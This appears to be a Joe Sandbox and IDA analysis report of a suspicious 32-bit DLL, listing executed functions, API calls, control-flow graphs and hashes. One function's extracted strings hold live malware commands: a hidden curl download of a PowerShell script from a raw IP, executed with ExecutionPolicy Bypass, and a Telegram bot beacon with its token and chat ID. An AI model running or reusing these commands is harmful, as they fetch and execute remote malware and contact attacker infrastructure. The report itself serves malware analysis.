10409->10410 10411 6f95d1de 10410->10411 10418 6f95d9fc 10411->10418 10414 6f956a8e __freea 14 API calls 10414->10406 10473 6f959f44 LeaveCriticalSection 10415->10473 10417 6f95d180 10417->10399 10420 6f95da25 10418->10420 10422 6f95d1e5 10418->10422 10419 6f95da74 10421 6f954ed3 _Deallocate 29 API calls 10419->10421 10420->10419 10423 6f95da4c 10420->10423 10421->10422 10422->10406 10422->10414 10425 6f95d96b 10423->10425 10426 6f95d977 CallCatchBlock 10425->10426 10433 6f95bb96 EnterCriticalSection 10426->10433 10428 6f95d985 10429 6f95d9b6 10428->10429 10434 6f95da9f 10428->10434 10447 6f95d9f0 10429->10447 10433->10428 10450 6f95bc6d 10434->10450 10436 6f95daaf 10437 6f95dab5 10436->10437 10439 6f95dae7 10436->10439 10440 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10436->10440 10463 6f95bbdc 10437->10463 10439->10437 10441 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10439->10441 10442 6f95dade 10440->10442 10443 6f95daf3 CloseHandle 10441->10443 10444 6f95bc6d ___scrt_uninitialize_crt 39 API calls 10442->10444 10443->10437 10445 6f95daff GetLastError 10443->10445 10444->10439 10445->10437 10446 6f95db0d ___scrt_uninitialize_crt 10446->10429 10472 6f95bbb9 LeaveCriticalSection 10447->10472 10449 6f95d9d9 10449->10422 10451 6f95bc7a 10450->10451 10454 6f95bc8f 10450->10454 10452 6f956a68 __dosmaperr 14 API calls 10451->10452 10453 6f95bc7f 10452->10453 10456 6f956a7b __dosmaperr 14 API calls 10453->10456 10455 6f956a68 __dosmaperr 14 API calls 10454->10455 10457 6f95bcb4 10454->10457 10458 6f95bcbf 10455->10458 10459 6f95bc87 10456->10459 10457->10436 10460 6f956a7b __dosmaperr 14 API calls 10458->10460 10459->10436 10461 6f95bcc7 10460->10461 10462 6f954f50 __strnicoll 39 API calls 10461->10462 10462->10459 10464 6f95bc52 10463->10464 10465 6f95bbeb 10463->10465 10466 6f956a7b __dosmaperr 14 API calls 10464->10466 10465->10464 10470 6f95bc15 10465->10470 10467 6f95bc57 10466->10467 10468 6f956a68 __dosmaperr 14 API calls 10467->10468 10469 6f95bc42 10468->10469 10469->10446 10470->10469 10471 6f95bc3c SetStdHandle 10470->10471 10471->10469 10472->10449 10473->10417 10474->10388 9414 6f95206a 9415 6f952073 9414->9415 9416 6f952078 9414->9416 9431 6f95223b 9415->9431 9420 6f951f34 9416->9420 9422 6f951f40 CallCatchBlock 9420->9422 9421 6f951f4f 9422->9421 9423 6f951f69 dllmain_raw 9422->9423 9424 6f951f64 __DllMainCRTStartup@12 9422->9424 9423->9421 9425 6f951f83 dllmain_crt_dispatch 9423->9425 9426 6f951fd5 9424->9426 9429 6f951e84 __DllMainCRTStartup@12 86 API calls 9424->9429 9425->9421 9425->9424 9426->9421 9427 6f951fde dllmain_crt_dispatch 9426->9427 9427->9421 9428 6f951ff1 dllmain_raw 9427->9428 9428->9421 9430 6f951fca dllmain_raw 9429->9430 9430->9426 9432 6f952251 9431->9432 9434 6f95225a 9432->9434 9435 6f9521ee GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 9432->9435 9434->9416 9435->9434

                                                                                                Executed Functions

                                                                                                Function 6F956EAB Relevance: 16.7, APIs: 11, Instructions: 188synchronizationCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 6f956eab-6f956eb7 1 6f956ece-6f956ed2 0->1 2 6f956eb9-6f956ecd call 6f956a7b call 6f954f50 0->2 1->2 4 6f956ed4-6f956ed8 1->4 6 6f956ee4-6f956f09 call 6f95ae09 4->6 7 6f956eda-6f956ee2 call 6f956a68 4->7 14 6f956f22-6f956f42 call 6f9571ed 6->14 15 6f956f0b-6f956f20 call 6f956a8e * 2 6->15 7->2 21 6f956f44-6f956f62 call 6f956a8e * 3 14->21 22 6f956f6c-6f956f73 14->22 28 6f956f65-6f956f67 15->28 21->28 23 6f956f75-6f956f77 22->23 24 6f956f78-6f956fc8 call 6f956a68 call 6f9533d0 call 6f95ae14 22->24 23->24 40 6f957014-6f957023 GetLastError call 6f956a21 24->40 41 6f956fca-6f956fd0 24->41 31 6f9570ab-6f9570ae 28->31 51 6f957025-6f957026 CloseHandle 40->51 52 6f95702c-6f95702e 40->52 43 6f956fd6-6f956fd8 41->43 44 6f9570af-6f9570b6 call 6f95535e 41->44 45 6f957039-6f95703c 43->45 46 6f956fda-6f956ff1 WaitForSingleObject GetExitCodeProcess 43->46 53 6f95703e-6f957040 45->53 54 6f95707a-6f95707c 45->54 46->40 49 6f956ff3-6f956ffb 46->49 55 6f957004-6f957006 49->55 56 6f956ffd-6f956ffe CloseHandle 49->56 51->52 59 6f957056-6f957078 call 6f956a8e * 3 52->59 60 6f957030-6f957037 CloseHandle 52->60 61 6f957042-6f957043 CloseHandle 53->61 62 6f957049-6f95704b 53->62 57 6f957085-6f9570a5 call 6f956a8e * 3 54->57 58 6f95707e-6f95707f CloseHandle 54->58 66 6f95700f-6f957012 55->66 67 6f957008-6f957009 CloseHandle 55->67 56->55 79 6f9570a7-6f9570aa 57->79 58->57 59->79 60->59 61->62 63 6f957054 62->63 64 6f95704d-6f95704e CloseHandle 62->64 63->59 64->63 66->59 67->66 79->31
                                                                                                APIs
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FDC
                                                                                                • GetExitCodeProcess.KERNELBASE(?,?), ref: 6F956FE9
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F956FFE
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957009
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957014
                                                                                                • __dosmaperr.LIBCMT ref: 6F95701B
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957026
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957031
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F957043
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95704E
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6F95707F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$ErrorLast$CodeExitFreeHeapObjectProcessSingleWait__dosmaperr
                                                                                                • String ID:
                                                                                                • API String ID: 2764183375-0
                                                                                                • Opcode ID: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction ID: a321e98985f0f9d9a18d7ef8a04501a5f8a3b317096c4e47111c4bc96319f699
                                                                                                • Opcode Fuzzy Hash: d5ae05d5f146bc4ca3e0d0321ca3818495068bc107bf2a68a8105dab6195e736
                                                                                                • Instruction Fuzzy Hash: 49515B7190020CEBEF12DFA4C984AEE7BB9EF46315F108166E910A61D1D731DA78DF62
                                                                                                Function 6F951E84 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951ECB
                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6F951EE5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                • String ID:
                                                                                                • API String ID: 2442719207-0
                                                                                                • Opcode ID: 2bbbc4437b33f0beafa3613e169e1d1912b658109abf41a96f938a2b6b962db6
                                                                                                • Instruction ID: e2276723bfa995d3542d43ed16c1eda4113e27017016161c2d1841421cb4f0a4
                                                                                                • Opcode Fuzzy Hash: 2bbbc4437b33f0beafa3613e169e1d1912b658109abf41a96f938a2b6b962db6
                                                                                                • Instruction Fuzzy Hash: 4D41D672D05715AFDB21CF69CC40BAE3AB9EF967A4F10411AE8146B2D1D730DDA1CBA0
                                                                                                Function 6F95912D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 130 6f95912d-6f959139 131 6f9591cb-6f9591ce 130->131 132 6f9591d4 131->132 133 6f95913e-6f95914f 131->133 134 6f9591d6-6f9591da 132->134 135 6f959151-6f959154 133->135 136 6f95915c-6f959175 LoadLibraryExW 133->136 139 6f9591f4-6f9591f6 135->139 140 6f95915a 135->140 137 6f959177-6f959180 GetLastError 136->137 138 6f9591db-6f9591eb 136->138 141 6f959182-6f959194 call 6f9561c3 137->141 142 6f9591b9-6f9591c6 137->142 138->139 143 6f9591ed-6f9591ee FreeLibrary 138->143 139->134 144 6f9591c8 140->144 141->142 147 6f959196-6f9591a8 call 6f9561c3 141->147 142->144 143->139 144->131 147->142 150 6f9591aa-6f9591b7 LoadLibraryExW 147->150 150->138 150->142
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,6417AA48,?,6F95923C,00000000,6F9510C9,00000000,00000000), ref: 6F9591EE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 3664257935-537541572
                                                                                                • Opcode ID: f554dc15ddbba9cf125c6ce60cf5df5e1b206662ab8630a6768cee15615cc257
                                                                                                • Instruction ID: 1ede92d87e88183e7490bbb336172c1a1857d4a00e499d7b6d6ec4c2ecc552f4
                                                                                                • Opcode Fuzzy Hash: f554dc15ddbba9cf125c6ce60cf5df5e1b206662ab8630a6768cee15615cc257
                                                                                                • Instruction Fuzzy Hash: E821EB71909621ABFF31CB348D88A9A376D9F437B4F110615ED16A72C8D730F921CAE0
                                                                                                Function 6F956CB6 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 208COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 151 6f956cb6-6f956cc3 152 6f956cc5-6f956cd8 call 6f956a7b call 6f954f50 151->152 153 6f956cdd-6f956ce0 151->153 162 6f956e6a-6f956e6c 152->162 153->152 155 6f956ce2-6f956ce7 153->155 155->152 157 6f956ce9-6f956ced 155->157 157->152 159 6f956cef-6f956cf2 157->159 159->152 161 6f956cf4-6f956d0f call 6f95f610 * 2 159->161 167 6f956d11-6f956d13 161->167 168 6f956d82-6f956d84 161->168 169 6f956d15-6f956d23 call 6f95f610 167->169 170 6f956d8c-6f956da0 call 6f95f610 167->170 171 6f956d86-6f956d88 168->171 172 6f956d8a 168->172 169->170 177 6f956d25-6f956d27 169->177 178 6f956da2-6f956dae call 6f9577f8 170->178 179 6f956dcd-6f956dcf 170->179 171->170 171->172 172->170 181 6f956d2a-6f956d2f 177->181 188 6f956db4-6f956dbe call 6f956eab 178->188 189 6f956e5e 178->189 180 6f956dd2-6f956dd7 179->180 180->180 183 6f956dd9-6f956def call 6f9578b8 180->183 181->181 184 6f956d31-6f956d44 call 6f9578b8 181->184 194 6f956df1-6f956dfb call 6f956a8e 183->194 195 6f956e00-6f956e10 call 6f956040 183->195 196 6f956d46-6f956d47 184->196 197 6f956d4c-6f956d5d call 6f956040 184->197 199 6f956dc3-6f956dc8 188->199 192 6f956e5f-6f956e65 call 6f956a8e 189->192 208 6f956e68-6f956e69 192->208 204 6f956e91-6f956e9a call 6f956a8e 194->204 211 6f956e16-6f956e2a call 6f956a7b 195->211 212 6f956e9c-6f956eaa call 6f954f7d 195->212 196->192 197->212 213 6f956d63-6f956d70 call 6f95a98c 197->213 199->204 204->208 208->162 221 6f956e2d-6f956e3d call 6f956040 211->221 213->212 220 6f956d76-6f956d80 call 6f956a8e 213->220 220->170 221->212 226 6f956e3f-6f956e4a call 6f9577f8 221->226 229 6f956e6d-6f956e8e call 6f956a7b call 6f956eab call 6f956a8e 226->229 230 6f956e4c-6f956e55 226->230 229->204 230->221 231 6f956e57-6f956e5d call 6f956a8e 230->231 231->189
                                                                                                APIs
                                                                                                • _strrchr.LIBCMT ref: 6F956CF9
                                                                                                • _strrchr.LIBCMT ref: 6F956D03
                                                                                                • _strrchr.LIBCMT ref: 6F956D18
                                                                                                  • Part of subcall function 6F956A8E: HeapFree.KERNEL32(00000000,00000000,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AA4
                                                                                                  • Part of subcall function 6F956A8E: GetLastError.KERNEL32(?,?,6F95A68A,?,00000000,?,?,6F95A6AF,?,00000007,?,?,6F95A384,?,?), ref: 6F956AAF
                                                                                                  • Part of subcall function 6F954F7D: IsProcessorFeaturePresent.KERNEL32(00000017,6F954F4F,?,00000000,00000000,00000000,00000000,?,00000000,?,6F954EC6,?,00000000,00000000,00000000,00000000), ref: 6F954F7F
                                                                                                  • Part of subcall function 6F954F7D: GetCurrentProcess.KERNEL32(C0000417,00000000,?,00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA2
                                                                                                  • Part of subcall function 6F954F7D: TerminateProcess.KERNEL32(00000000,?,?,6F954F6F,00000000,00000000,00000000,00000000,00000000,?,6F951118), ref: 6F954FA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strrchr$Process$CurrentErrorFeatureFreeHeapLastPresentProcessorTerminate
                                                                                                • String ID: .com
                                                                                                • API String ID: 3694955208-4200470757
                                                                                                • Opcode ID: b89a937c685fd089e0260fed234e519aac03d3cfd6b98381ce62ab1e95df06fe
                                                                                                • Instruction ID: 4c2b800bafc330f446592be22e472aa8b40ae3d784f9c81bcc1d74f6572a7735
                                                                                                • Opcode Fuzzy Hash: b89a937c685fd089e0260fed234e519aac03d3cfd6b98381ce62ab1e95df06fe
                                                                                                • Instruction Fuzzy Hash: 07514872504305AAEB16DE74DC44BAF377CDF53768F140929E910AB2C3EB22E938C261
                                                                                                Function 6F951F34 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 240 6f951f34-6f951f45 call 6f952730 243 6f951f47-6f951f4d 240->243 244 6f951f56-6f951f5d 240->244 243->244 245 6f951f4f-6f951f51 243->245 246 6f951f5f-6f951f62 244->246 247 6f951f69-6f951f7d dllmain_raw 244->247 248 6f95202f-6f95203e 245->248 246->247 249 6f951f64-6f951f67 246->249 250 6f952026-6f95202d 247->250 251 6f951f83-6f951f94 dllmain_crt_dispatch 247->251 252 6f951f9a-6f951fac call 6f952286 249->252 250->248 251->250 251->252 255 6f951fd5-6f951fd7 252->255 256 6f951fae-6f951fb0 252->256 257 6f951fde-6f951fef dllmain_crt_dispatch 255->257 258 6f951fd9-6f951fdc 255->258 256->255 259 6f951fb2-6f951fd0 call 6f952286 call 6f951e84 dllmain_raw 256->259 257->250 260 6f951ff1-6f952023 dllmain_raw 257->260 258->250 258->257 259->255 260->250
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                • String ID:
                                                                                                • API String ID: 3136044242-0
                                                                                                • Opcode ID: f39c099539444fd164665c3a7531fb4ba72e803a38b6eaf60135d062b150ed0f
                                                                                                • Instruction ID: 12a90bac32d630ebe43dbcbb5dfe6bd070e1fa0829f1c007a7fd4f5244ca9082
                                                                                                • Opcode Fuzzy Hash: f39c099539444fd164665c3a7531fb4ba72e803a38b6eaf60135d062b150ed0f
                                                                                                • Instruction Fuzzy Hash: 04217171D01715ABDB22CF65C840AAF3A7DEB967A4F014116FC146A2D1D730DDA5CBA0
                                                                                                Function 6F951000 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                • cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -, xrefs: 6F951010
                                                                                                • powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}", xrefs: 6F95101D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: task
                                                                                                • String ID: cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/pilgm.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -$powershell -WindowStyle Hidden -Command "& {Invoke-RestMethod -Uri 'https://api.telegram.org/bot7453569667:AAEXd9axbZZCeE5q99NDzg6KMWdoKbKsvlU/sendMessage?chat_id=7654016235&text=FileStarted!' -Method Post}"
                                                                                                • API String ID: 1384045349-2968791885
                                                                                                • Opcode ID: 1ae58ab471330fdb1f05da6f03169599845c29f2ff9a5343fe61446ffa99f7c5
                                                                                                • Instruction ID: b0a6ff7db1b291017c8c5855dc18d32104c4796cba38b27d8e520abd0a3aa384
                                                                                                • Opcode Fuzzy Hash: 1ae58ab471330fdb1f05da6f03169599845c29f2ff9a5343fe61446ffa99f7c5
                                                                                                • Instruction Fuzzy Hash: 56F03070D1030CA7DF44EFA4E9929BE73389F31258F900068B806661E2FF71EA69C691
                                                                                                Function 6F955232 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,6F95522C,00000000,6F954D53,?,?,6417AA48,6F954D53,?), ref: 6F955243
                                                                                                • TerminateProcess.KERNEL32(00000000,?,6F95522C,00000000,6F954D53,?,?,6417AA48,6F954D53,?), ref: 6F95524A
                                                                                                • ExitProcess.KERNEL32 ref: 6F95525C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 41b9b31108cba0d11bf0442ceb6e522d1cfa5f4c18075642e3d1fb3e050704f8
                                                                                                • Instruction ID: 56aa2e9e73a434e648341db88ae513337887d601ffda823a7a27e729d01ee67d
                                                                                                • Opcode Fuzzy Hash: 41b9b31108cba0d11bf0442ceb6e522d1cfa5f4c18075642e3d1fb3e050704f8
                                                                                                • Instruction Fuzzy Hash: 73D09E31004604ABEF016F64CC4C9993F2AAF453A97405418B9195A0B6CB75E971DF50
                                                                                                Function 6F951D7D Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __RTC_Initialize.LIBCMT ref: 6F951DCA
                                                                                                  • Part of subcall function 6F95228C: InitializeSListHead.KERNEL32(6F967C70,6F951DD4,6F965708,00000010,6F951D65,?,?,?,6F951F8D,?,00000001,?,?,00000001,?,6F965750), ref: 6F952291
                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F951E34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                • String ID:
                                                                                                • API String ID: 3231365870-0
                                                                                                • Opcode ID: f64e6f50f4502f81fd2f06a4c8b2b9356389a74d759160b0416409b9866f7635
                                                                                                • Instruction ID: dbd21dee974c30aa6a56cc72ae674814fda50462661509d0bfe32484781d4195
                                                                                                • Opcode Fuzzy Hash: f64e6f50f4502f81fd2f06a4c8b2b9356389a74d759160b0416409b9866f7635
                                                                                                • Instruction Fuzzy Hash: E12102329483119AFF06EFB8A40079C37A19F6372CF10045AD5842B1D3DF32E5B8C662
                                                                                                Function 6F95962C Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 337 6f95962c-6f959631 338 6f959633-6f95964b 337->338 339 6f95964d-6f959651 338->339 340 6f959659-6f959662 338->340 339->340 341 6f959653-6f959657 339->341 342 6f959674 340->342 343 6f959664-6f959667 340->343 344 6f9596ce-6f9596d2 341->344 347 6f959676-6f959683 GetStdHandle 342->347 345 6f959670-6f959672 343->345 346 6f959669-6f95966e 343->346 344->338 348 6f9596d8-6f9596db 344->348 345->347 346->347 349 6f959685-6f959687 347->349 350 6f9596b0-6f9596c2 347->350 349->350 351 6f959689-6f959692 GetFileType 349->351 350->344 352 6f9596c4-6f9596c7 350->352 351->350 353 6f959694-6f95969d 351->353 352->344 354 6f9596a5-6f9596a8 353->354 355 6f95969f-6f9596a3 353->355 354->344 356 6f9596aa-6f9596ae 354->356 355->344 356->344
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 6F959678
                                                                                                • GetFileType.KERNELBASE(00000000), ref: 6F95968A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999756891.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1999736521.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999777116.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999796968.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999816006.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6f950000_loaddll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileHandleType
                                                                                                • String ID:
                                                                                                • API String ID: 3000768030-0
                                                                                                • Opcode ID: c95030bf413a9d9a69df89d539d14eee86f152bcba791ef97f0a99dc5a1c4f46
                                                                                                • Instruction ID: d7c413c12d01cc5b8ea4633458b3b9626b5e2a664bd3fa8d554baa7349939e05
                                                                                                • Opcode Fuzzy Hash: c95030bf413a9d9a69df89d539d14eee86f152bcba791ef97f0a99dc5a1c4f46
                                                                                                • Instruction Fuzzy Hash: 9B11E9B1909B4146F730CE3E8C886627EA9AB47230B24071EE0B7865F9C731E4ADC645
                                                                                                Function 6F95AE14 Relevance: 1.6, APIs: 1, Instructions: 89processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000001,?,?,?,00000000,?,00000000,00000001,00000000,?,?,?,?,00000000,?), ref: 6F95AEC9
                                                                                                Memory Dump Source
